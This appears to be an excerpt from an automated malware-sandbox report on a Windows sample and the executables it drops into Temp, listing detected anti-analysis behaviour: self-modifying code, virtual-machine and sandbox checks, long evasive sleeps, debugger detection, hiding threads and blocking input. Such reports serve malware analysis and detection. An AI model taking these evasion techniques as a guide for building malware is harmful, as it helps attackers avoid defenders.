Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BEF6B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C7C8EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CAF6B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D3C8EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 4A3277 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 2F608E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 4B442E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 53184C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Special instruction interceptor: First address: 8CFC3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Special instruction interceptor: First address: 8CFB5B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Special instruction interceptor: First address: B027A4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 67DE86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 67DDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 831E84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 67DD93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 8D0B23 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5DDDE86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5DDDDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5F91E84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 681E23 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5DDDD93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 6030B23 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5DE1E23 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 4930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 4B90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 49B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 4EA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 4FC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 6FC0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04CC07D4 rdtsc 0_2_04CC07D4
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Window / User API: threadDelayed 526
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe API coverage: 3.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep count: 54 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep time: -108054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664 Thread sleep count: 325 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664 Thread sleep time: -9750000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep time: -78039s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep time: -112056s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep count: 54 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep time: -108054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7892 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7908 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7984 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7904 Thread sleep time: -46023s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7992 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7896 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7916 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7900 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7204 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe TID: 4564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe TID: 5264 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 11_2_006DDBBE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E68EE FindFirstFileW,FindClose, 11_2_006E68EE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 11_2_006E698F
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_006DD076
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_006DD3A9
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_006E9642
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_006E979D
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 11_2_006E9B2B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E5C97 FindFirstFileW,FindNextFileW,FindClose, 11_2_006E5C97
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_006742DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477
Source: file.exe, 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1643474943.0000000000BD3000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000001.00000000.1677483084.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000000.1687648454.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2308286880.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, 37df924488.exe, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp, ae5cfd188c.exe, ae5cfd188c.exe, 0000000A.00000002.2809286945.0000000000487000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_^
Source: ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWrs
Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%Sat
Source: 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarea
Source: 37df924488.exe, 00000009.00000002.2578174288.00000000014B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW[
Source: file.exe, 00000000.00000003.1679173652.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:I
Source: firefox.exe, 0000001A.00000002.2790332131.000001B8C5500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9-%SystemRoot%\system32\wshbth.dllHyper-V RAW
Source: 2ada66c192.exe, 0000001E.00000002.2918205303.0000000001768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%
Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001484000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2811951266.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2692799251.0000000001092000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2690178414.000000000108D000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2693268456.00000000010B1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 00000018.00000002.2795803239.000002BA555C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2788989951.000001B8C541D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYQ
Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareeA
Source: file.exe, 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1643474943.0000000000BD3000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000001.00000000.1677483084.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000000.1687648454.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2308286880.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp, ae5cfd188c.exe, 0000000A.00000002.2809286945.0000000000487000.00000040.00000001.01000000.00000009.sdmp, 37df924488.exe, 0000001B.00000002.2761291474.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: firefox.exe, 0000001A.00000002.2782423918.000001B8C4F1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: firefox.exe, 0000001A.00000002.2790332131.000001B8C5500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 2ada66c192.exe, 0000001E.00000002.2918205303.0000000001768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW#
Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$
Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5U
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04CC07D4 rdtsc 0_2_04CC07D4
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006EEAA2 BlockInput, 11_2_006EEAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_006A2622
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_006742DE
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1652B mov eax, dword ptr fs:[00000030h] 0_2_00A1652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A1A302 mov eax, dword ptr fs:[00000030h] 0_2_00A1A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00ADA302 mov eax, dword ptr fs:[00000030h] 1_2_00ADA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AD652B mov eax, dword ptr fs:[00000030h] 1_2_00AD652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00ADA302 mov eax, dword ptr fs:[00000030h] 2_2_00ADA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AD652B mov eax, dword ptr fs:[00000030h] 2_2_00AD652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ADA302 mov eax, dword ptr fs:[00000030h] 6_2_00ADA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AD652B mov eax, dword ptr fs:[00000030h] 6_2_00AD652B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00694CE8 mov eax, dword ptr fs:[00000030h] 11_2_00694CE8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 11_2_006D0B62
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
